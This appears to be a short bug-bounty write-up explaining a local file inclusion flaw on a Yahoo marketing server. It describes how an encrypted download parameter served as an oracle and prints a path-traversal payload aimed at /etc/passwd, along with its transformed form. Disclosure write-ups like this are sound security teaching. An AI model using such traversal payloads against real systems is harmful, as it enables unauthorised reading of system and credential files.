Local File Include on marketing-dam.yahoo.com
RedShark1802 gives a good description of the bug on the ticket summary section. So much of this will be a reiteration and an attempt to break it down further.
The URL that RedShark1802 starts to play with is nativity as so
With the URL encoding removed
The hj is the vulnerable variable, it specifies the file to download by passing the file name in an encrypted fashion.
Any encrypted string passed in via hj would be decrypted and would be part of the file download prompt. This allowed RedShark1802 to passing arbitrary strings like "aaaaaaaaaa" and obverse the response to come up with the proper attack string. A vulnerability like this is called an Oracle as it gives you an opportunity to make the encryption moot.Eventually he was able to get the payload of
/../../../../../../../../etc/passwdto the proper format of
/../../../../../../../../79d/zGcIwdand collect himself a cool $2500